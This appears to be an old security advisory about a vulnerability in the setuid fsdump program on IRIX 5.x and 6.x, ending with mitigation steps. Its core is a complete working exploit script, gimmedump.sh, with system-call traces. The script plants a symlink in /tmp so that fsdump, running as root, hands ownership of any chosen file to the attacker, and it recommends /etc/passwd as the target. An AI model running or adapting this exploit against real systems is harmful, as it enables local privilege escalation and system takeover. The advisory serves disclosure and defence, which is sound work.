COMMAND

    /var/rfindd/fsdump

SYSTEMS AFFECTED

    IRIX 5.x, 6.0, 6.0.1, 6.1, 6.2

PROBLEM

    The   fsdump   program   is   found   in   the  eoe.sw.rfindd  and
    eoe2.sw.rfindd  subsystems  which  are  not  installed by default.
    As  optional  subsystems,  these   packages  must  be   explicitly
    installed for use.  Only systems with  the fsdump program  present
    are vulnerable.

    Exploiting fsdump just  one time you  can change the  owner of any
    file to yourself. Didn't you see the program changes the owner  of
    .pag & .dir files to the user running it?

    ------------------------------------------------------------------
        #!/bin/sh
        # gimmedump.sh
        #
        # This exploits the serious vulnerability in IRIX's fsdump(1M)
        # program  and attempts  to change  the owner  of an arbitrary
        # file  to  yourself.  (You  know /etc/passwd is an  excellent
        # target.)  Tested on both IRIX 5.3 and IRIX64 6.2.
        # I think  this bug may  be exploited on  any version of  IRIX
        # machines currently running.
        # Here are some system call traces on the program, which  show
        # what the problem is:
        #
        #  379mS getuid() = 1128 euid=0
        #  379mS getuid() = 1128 euid=0
        #  379mS getuid() = 1128 euid=0
        #  379mS getgid() = 20 egid=20
        #  379mS chdir(/usr/var/tmp/) OK
        #  380mS chmod(gimme, 0644) errno = 2 (No such file or directory)
        #  380mS chown(gimme, 1128, 20) errno = 2 (No such file or directory)
        #  380mS chmod(fsdump.pag, 0644) OK
        #  380mS chown(fsdump.pag, 1128, 20) OK
        #  380mS chmod(fsdump.dir, 0644) OK
        #  381mS chown(fsdump.dir, 1128, 20) OK
        #
        # 1996 10.23    Jaechul Choe, CS Dept. in KAIST, Republic of Korea
        #               poison@worak.kaist.ac.kr

		PROG="`basename $0`"
		if [ $# -ne 1 ]; then
		        echo "Usage: $PROG <target>"
		        exit 1
		fi

		if [ ! -f /var/rfindd/fsdump ]; then
		        echo "fsdump doesn't exist! - exiting"
		        exit 1
		fi

		cd /tmp
		ln -s $1 fsdump.dir
		echo "Be patient! It will take some time to run."
		echo "If you can't really wait, strike Ctrl-Z and see to the target file.\n"
		/var/rfindd/fsdump -Fgimme /
		echo "\nDone. Here is the result."
		ls -al $1
		rm -f fsdump.dir fsdump.pag gimme
		exit 0

SOLUTION

    chmod -s /var/rfindd/fsdump

    This  will  break  it.   But  the  whole  idea of rfind is sort of
    risky, and I haven't heard about people using it a lot, so if  you
    are concerned about the security  on your system, you may  want as
    well to do this:

        chkconfig rfindd off

    Or, alternatively,  you can  wait for  a patch  from SGI.  Chances
    are, it'll be out this millenium (but I wouldn't bet on it).